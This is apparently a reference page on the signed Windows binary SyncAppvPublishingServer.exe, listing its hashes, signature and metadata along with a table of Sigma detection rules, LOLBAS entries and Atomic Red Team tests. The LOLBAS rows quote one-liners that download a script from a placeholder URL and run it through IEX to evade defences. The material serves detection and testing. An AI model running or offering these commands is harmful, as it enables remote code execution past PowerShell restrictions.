SyncAppvPublishingServer.exe

  • File Path: C:\WINDOWS\system32\SyncAppvPublishingServer.exe
  • Description: Microsoft Application Virtualization Sync Utility

Hashes

Type Hash
MD5 52E0676397575A4D3854856469594B6C
SHA1 5D9FCEEB1E76BFD4AC4FA37388060BA1241CF1C2
SHA256 54445D511D9C53749410FCA4457A31459422020254CBF19D8FE23BAE4955DA0D
SHA384 E246A861D1C51F241C308E254A713C71E7D88025BC52A21BF65D344104DF420EA1D8A591923851B5A8556CA59AE717AD
SHA512 3F214E48086CFF77C032C8C74EFA8DF6D36CB9E35312977A27E1FE63837BBFAC2BC488C8D37F8B9626B79D6A53C7BD75F77F3CC33452E8A06CEE99C12C3017A2
SSDEEP 768:JsYT/QSJpwOQtWf3zvKBx+cCgMngU0Sor5vv1EY0961wqnOGhj3M1PErbs:Jr/pRgMzi7QnvolvNx0961wAsPEfs
IMP F257653306F459B41C68AF82790A4465
PESHA1 181457D0E8AB3DB26EFC592F201465C1CE0E8B72
PE256 0A573722371A109CEFE66A9CEF2217C444D3658ABCD19FA17B482A293191B7AC

Runtime Data

Loaded Modules:

Path
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\system32\SyncAppvPublishingServer.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: syncappvpublishingserver.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.282 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.282
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/54445d511d9c53749410fca4457a31459422020254cbf19d8fe23bae4955da0d/detection

Possible Misuse

The following table contains possible examples of SyncAppvPublishingServer.exe being misused. While SyncAppvPublishingServer.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma powershell_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma powershell_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma powershell_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma powershell_syncappvpublishingserver_exe.yml - 'SyncAppvPublishingServer.exe' DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml Image\|endswith: '\SyncAppvPublishingServer.exe' DRL 1.0
sigma image_load_in_memory_powershell.yml - '\syncappvpublishingserver.exe' DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml ContextInfo\|contains: 'SyncAppvPublishingServer.exe' DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml ScriptBlockText\|contains: 'SyncAppvPublishingServer.exe' DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml Image\|endswith: '\SyncAppvPublishingServer.exe' DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml - '\SyncAppvPublishingServer.vbs' DRL 1.0
LOLBAS Syncappvpublishingserver.yml Name: SyncAppvPublishingServer.exe  
LOLBAS Syncappvpublishingserver.yml - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX"  
LOLBAS Syncappvpublishingserver.yml Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures  
LOLBAS Syncappvpublishingserver.yml - Path: C:\Windows\System32\SyncAppvPublishingServer.exe  
LOLBAS Syncappvpublishingserver.yml - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe  
LOLBAS Syncappvpublishingserver.yml - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed  
LOLBAS Syncappvpublishingserver.yml Name: Syncappvpublishingserver.vbs  
LOLBAS Syncappvpublishingserver.yml - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX"  
LOLBAS Syncappvpublishingserver.yml - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs  
atomic-red-team index.md - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team T1216.md - Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution MIT License. © 2018 Red Canary
atomic-red-team T1216.md ## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution MIT License. © 2018 Red Canary
atomic-red-team T1216.md Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. MIT License. © 2018 Red Canary
atomic-red-team T1216.md C:\windows\system32\SyncAppvPublishingServer.vbs “\n;#{command_to_execute}” MIT License. © 2018 Red Canary
atomic-red-team T1218.md - Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code MIT License. © 2018 Red Canary
atomic-red-team T1218.md ## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code MIT License. © 2018 Red Canary
atomic-red-team T1218.md Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. MIT License. © 2018 Red Canary
atomic-red-team T1218.md SyncAppvPublishingServer.exe “n; #{powershell_code}” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.